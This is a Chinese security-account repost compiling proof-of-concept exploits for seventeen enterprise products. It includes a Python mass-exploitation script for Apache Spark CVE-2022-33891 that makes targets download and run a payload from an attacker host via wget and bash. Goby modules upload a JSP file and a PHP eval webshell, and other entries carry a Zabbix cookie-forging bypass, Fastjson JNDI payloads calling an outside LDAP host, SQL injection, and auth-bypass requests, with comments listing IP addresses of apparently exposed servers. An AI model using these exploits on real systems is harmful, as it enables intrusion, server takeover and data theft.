1、Apache Spark UI 命令注入漏洞 [CVE-2022-33891]
Shodan 搜索:http.favicon.hash:856048515
import requests, ConfigParser, csv, requests, urllib3, time
import pandas as pd
ua = 'https://github.com/west-wind/cve-2022-33891'
config = ConfigParser.ConfigParser()
config.readfp(open(r'POC.conf'))
yourHost = config.get('PAYLOAD', 'yourHostHere')
yourPayload = config.get('PAYLOAD', 'yourPayloadHere')
def usage():
print "nWARNING: This script is inteded to be used for vulnerability testing purposes only. Ensure you're authorised to run your payload on the target prior to using this script!"
print "nExit now, if you are not authorised."
print "nThis POC expects to receive all targets in a CSV file --> allTargets.csv with one column titled --> targets, ex., http://12.23.45.67:9099 or http://spark.domain.com"
print "The / will be added by the script."
print "nEnter the payload to be executed on the target in the POC.conf file. "
print "Your host in --> yourHostHere 'http://my_domain_here.com'"
print "Your payload in --> yourPayloadHere 'payload.sh'nnn"
time.sleep(5)
def CVE_2022_33891(target):
global yourPayload, yourHost, ua
try:
url = target + '/?doAs=`wget ' + yourHost + '/' + yourPayload + ' && chmod 755 ' + yourPayload + ' | bash`'
header = {'User-Agent': ua}
response = requests.get(url, headers=header, verify=False)
print "n[+] URL: ",url,"n[+] HTTP Status: ",response.status_code,"n[+] HTTP Text: ",response.text
except Exception as pocEx:
print "n[!] Exception occured: ",pocEx, url
usage()
try:
df = pd.read_csv('allTargets.csv')
column1 = df.targets
for target in column1:
CVE_2022_33891(target)
except Exception as mainEx:
print "nException occured in main: ",mainEx
2、Fastjson代码执行漏洞(CVE-2022-25845)
Fastjson <= 1.2.80
{
"@type": "java.lang.Exception",
"@type": "com.github.isafeblue.fastjson.SimpleException",
"domain": "calc"
}
3、H3C CVM 前台任意文件上传漏洞
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)
func init() {
expJson := `{
"Name": "H3C CVM Arbitrary File Upload Vulnerability",
"Description": "<p><span style="color: var(--primaryFont-color);">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style="color: var(--primaryFont-color);">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"Product": "H3C-CVM",
"Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
"DisclosureDate": "2022-05-25",
"Author": "[email protected]",
"FofaQuery": " server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")",
"GobyQuery": " server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")",
"Level": "3",
"Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "fileName",
"type": "input",
"value": "evil",
"show": ""
},
{
"name": "fileContent",
"type": "input",
"value": "<%out.println("123");%>",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"Arbitrary File Creation"
],
"VulType": [
"Arbitrary File Creation"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "8.0",
"Translation": {
"CN": {
"Name": "H3C CVM 前台任意文件上传漏洞",
"Product": "H3C-CVM",
"Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
"Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
"Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;"><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C CVM</span><span style="color: rgb(22, 28, 37); font-size: 16px;"> </span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
"VulType": [
"⽂件上传"
],
"Tags": [
"⽂件上传"
]
},
"EN": {
"Name": "H3C CVM Arbitrary File Upload Vulnerability",
"Product": "H3C-CVM",
"Description": "<p><span style="color: var(--primaryFont-color);">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style="color: var(--primaryFont-color);">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
"Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"VulType": [
"Arbitrary File Creation"
],
"Tags": [
"Arbitrary File Creation"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
// 上传文件
requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Header.Store("Content-range", "bytes 0-10/20")
requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
requestConfig.Data = fileContent
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ""success\":true") {
return true
}
}
return false
}
checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
requestConfig := httpclient.NewGetRequestConfig("/" + fileName)
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
}
return false
}
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
rand := goutils.RandomHexString(6)
rand2 := goutils.RandomHexString(6)
if exploitUploadFile2398429842(rand2, "<%out.print(""+rand+"");%>", u) {
return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)
}
return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
fileContent := ss.Params["fileContent"].(string)
fileName := ss.Params["fileName"].(string)
if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {
expResult.Success = true
expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp"
}
return expResult
},
))
}
// http://183.63.173.141:8080/
// https://60.190.202.42:8443/
// http://61.53.232.5:28080/
4、H3C企业路由器(ER、ERG2、GR系列)任意用户登录/命令执行
/userLogin.asp/actionpolicy_status/
5、Roxy-WI 未经身份验证的远程代码执行
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: https://192.168.56.114
Dnt: 1
Referer: https://192.168.56.114/app/login.py
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
alert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45
6、TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution",
"Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. </p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
"Product": "TRS-MAS",
"Homepage": "http://www.trs.com.cn/",
"DisclosureDate": "2022-04-28",
"Author": "liubye",
"FofaQuery": "header="X-Mas-Server" || banner="X-Mas-Server"",
"GobyQuery": "header="X-Mas-Server" || banner="X-Mas-Server"",
"Level": "3",
"Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
"Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.<br></p>",
"References": [
"https://cn-sec.com/archives/966820.html"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmdLine",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/mas/sysinfo/testCommandExecutor.jsp",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "测试命令行进程执行",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "测试命令行进程执行",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"Command Execution"
],
"VulType": [
"Command Execution"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.7",
"Translation": {
"CN": {
"Name": "TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行",
"Product": "拓尔思-MAS",
"Description": "<p><span style="color: rgb(45, 46, 47); font-size: medium;">TRS MAS是基于移动互联网时代音视频的使用特点,</span><span style="color: rgb(45, 46, 47); font-size: medium;">北京拓尔思信息技术股份有限公司</span><span style="color: rgb(45, 46, 47); font-size: medium;">推出的一套通用型媒资管理系统,同一个音视频资源能面向不同的终端平台提供使用,有效节省成本,简化操作。</span></p><p><span style="color: rgb(45, 46, 47); font-size: medium;">TRS MAS </span><span style="color: rgb(45, 46, 47); font-size: medium;">v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。</span><br></p>",
"Recommendation": "<p><span style="color: rgb(0, 0, 0); font-size: 18px;">目前受漏洞影响的版本官方已停止更新,建议使用防御设备进行防护,禁止对 <span style="color: rgb(0, 0, 0); font-size: 18px;">/sysinfo/testCommandExecutor.jsp 路径的访问。</span></span><br></p>",
"Impact": "<p><span style="font-size: medium; color: rgb(45, 46, 47);">TRS MAS </span><span style="font-size: medium; color: rgb(45, 46, 47);">v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。</span><br></p>",
"VulType": [
"命令执⾏"
],
"Tags": [
"命令执⾏"
]
},
"EN": {
"Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution",
"Product": "TRS-MAS",
"Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. </p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
"Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.<br></p>",
"Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>",
"VulType": [
"Command Execution"
],
"Tags": [
"Command Execution"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
7、TRS-WAS远程命令执行
/mas/sysinfo/testCommandExecutor.jsp
8、WebLogic 反序列化远程命令执行路径探测
/_async/AsyncResponseService
9、Zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)
import re
from collections import OrderedDict
from pocsuite3.lib.utils import random_str
from pocsuite3.api
import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option
import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
from pocsuite3.modules.listener import REVERSE_PAYLOAD
import base64
import json
from urllib.parse import unquote,quote
requests.packages.urllib3.disable_warnings()
class DemoPOC(POCBase):
vulID = '0' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' # 默认为1
author = 'Infiltrator' # PoC作者的大名
vulDate = '2022-2-25' # 漏洞公开的时间,不知道就写今天
createDate = '2021-8-20' # 编写 PoC 的日期
updateDate = '2021-9-12' # PoC 更新的时间,默认和编写时间一样
references = [''] # 漏洞地址来源,0day不用写
name = 'Zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)' # PoC 名称
appPowerLink = '' # 漏洞厂商主页地址
appName = '-' # 漏洞应用名称
appVersion = '-' # 漏洞影响版本
vulType = VUL_TYPE.COMMAND_EXECUTION # 漏洞类型,类型参考见 漏洞类型规范表
category = POC_CATEGORY.EXPLOITS.WEBAPP
samples = [] # 测试样列,就是用 PoC 测试成功的网站
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
desc = '''
在启用 SAML SSO 身份验证(非默认)的情况下,未经身份验证的攻击者可以通过修改Cookie数据,绕过身份认证获得对 Zabbix 前端的管理员访问权限。
''' # 漏洞简要描述
pocDesc = '''
poc的用法描述
''' # POC用法描述
def _options(self):
opt = OrderedDict() # value = self.get_option('key')
return opt
def _verify(self):
output = Output(self)
# 验证代码
s=requests.Session()
try:
html=s.get(self.url,verify=False)
except:
output.fail('Could not get Cookie!')
return output
try:
set_cookie=base64.b64decode(unquote(html.cookies['zbx_session'])).decode('utf8')
except KeyError:
output.fail('Could not find zbx_session in Cookies')
return output
set_cookie=json.loads(set_cookie)
new_cookie=base64.b64encode(json.dumps({"saml_data":{"username_attribute":"Admin"},'sessionid':set_cookie['sessionid'],'sign':set_cookie['sign']}).encode('utf8')).decode('utf8')
head={'Cookie':'zbx_session='+new_cookie}
res=s.get(self.url+'/index_sso.php',headers=head,verify=False)
if 'User settings' and 'Zabbix SIA' in res.text:
result={}
result["Cookie"]='zbx_session='+new_cookie
output.success(result)
return output
def _attack(self):
_verify()
# 注册 DemoPOC 类
register_poc(DemoPOC)
10、帆软报表反序列化
webroot/decision/remote/design/channel
11、泛微OA-0day管理员任意登录
URL
/mobile/plugin/VerifyQuickLogin.jsp
Payload
identifier=1&language=1&ipaddress=
12、海康威视综合运营管理平台RCE漏洞
URL
/bic/ssoService/v1/applyCT
Payload
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnstunnel.run","autoCommit":true}}
13、用友GRP-U8财务管理软件任意文件上传
/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=181=1&1=1&1=1&foldername=%2e%2e%2f&filename=
14、用友时空KSOA软件前台文件上传漏洞
/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp
15、红帆医疗云OA医用版前台SQL注入漏洞
/api/switch-value/list?sorts=%5B%7B%22Field%22:%22convert(int,stuff((select%20quotename(name)%20from%20sys.databases%20for%20xml%20path(%27%27),1,0,%27%27))%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c5c89905a7)
16、绿盟下一代防火墙 resourse.php 任意文件上传漏洞
package exploits
import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"net/url"
"strings"
"time"
)
func init() {
expJson := `{
"Name": "nsfocus resourse.php arbitrary file upload vulnerability",
"Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
"Product": "nsfocus",
"Homepage": "https://www.nsfocus.com.cn/",
"DisclosureDate": "2022-07-18",
"Author": "LittleBlack",
"FofaQuery": "banner="PHPSESSID_NF" || header="PHPSESSID_NF"",
"GobyQuery": "banner="PHPSESSID_NF" || header="PHPSESSID_NF"",
"Level": "3",
"Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
"Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "system('id');",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"VulType": [
"Code Execution"
],
"Tags": [
"Code Execution"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.5",
"Translation": {
"CN": {
"Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
"Product": "绿盟下一代防火墙",
"Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
"Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新:<a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
"Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
"VulType": [
"代码执⾏"
],
"Tags": [
"代码执⾏"
]
},
"EN": {
"Name": "nsfocus resourse.php 任意文件上传漏洞",
"Product": "nsfocus",
"Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
"Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
"Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
"VulType": [
"Code Execution"
],
"Tags": [
"Code Execution"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
uri1 := "/api/v1/device/bugsInfo"
cfg1 := httpclient.NewPostRequestConfig(uri1)
cfg1.VerifyTls = false
cfg1.FollowRedirect = false
cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9rnContent-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"rnrnlang|s:52:"../../../../../../../../../../../../../../../../tmp/";rn--1d52ba2a11ad8a915eddab1a0e85acd9--rn"
if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
time.Sleep(time.Second * 5)
uri2 := "/api/v1/device/bugsInfo"
cfg2 := httpclient.NewPostRequestConfig(uri2)
cfg2.VerifyTls = false
cfg2.FollowRedirect = false
cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
cfg2.Data = "--4803b59d015026999b45993b1245f0efrnContent-Disposition: form-data; name="file"; filename="compose.php"rnrn<?php eval($_POST[1]);?>rn--4803b59d015026999b45993b1245f0ef--rn"
if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
uri3 := "/mail/include/header_main.php"
cfg3 := httpclient.NewPostRequestConfig(uri3)
cfg3.VerifyTls = false
cfg3.FollowRedirect = false
cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
cfg3.Data = "1=print+md5%281%29%3B"
if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
}
}
}
return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
cmd := ss.Params["cmd"].(string)
u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
uri1 := "/api/v1/device/bugsInfo"
cfg1 := httpclient.NewPostRequestConfig(uri1)
cfg1.VerifyTls = false
cfg1.FollowRedirect = false
cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9rnContent-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"rnrnlang|s:52:"../../../../../../../../../../../../../../../../tmp/";rn--1d52ba2a11ad8a915eddab1a0e85acd9--rn"
if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
time.Sleep(time.Second * 5)
uri2 := "/api/v1/device/bugsInfo"
cfg2 := httpclient.NewPostRequestConfig(uri2)
cfg2.VerifyTls = false
cfg2.FollowRedirect = false
cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
cfg2.Data = "--4803b59d015026999b45993b1245f0efrnContent-Disposition: form-data; name="file"; filename="compose.php"rnrn<?php eval($_POST[1]);?>rn--4803b59d015026999b45993b1245f0ef--rn"
if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
uri3 := "/mail/include/header_main.php"
cfg3 := httpclient.NewPostRequestConfig(uri3)
cfg3.VerifyTls = false
cfg3.FollowRedirect = false
cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
expResult.Output = resp3.RawBody
expResult.Success = true
}
}
}
return expResult
},
))
}
//https://222.75.146.134:4433
17、通达OA登录认证绕过
URL
/module/retrieve_pwd/header.inc.php?_ZQA_ID=3fb5b8eadff9c793
Payload
SESSION%5BLOGIN_THEME%5D=15&_SESSION%5BLOGIN_USER_ID%5D=1&SESSION%5BLOGIN_UD%5D=1
原文始发于微信公众号(安全透视镜):【2022护网情报更新】护网漏洞更新,含POC
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论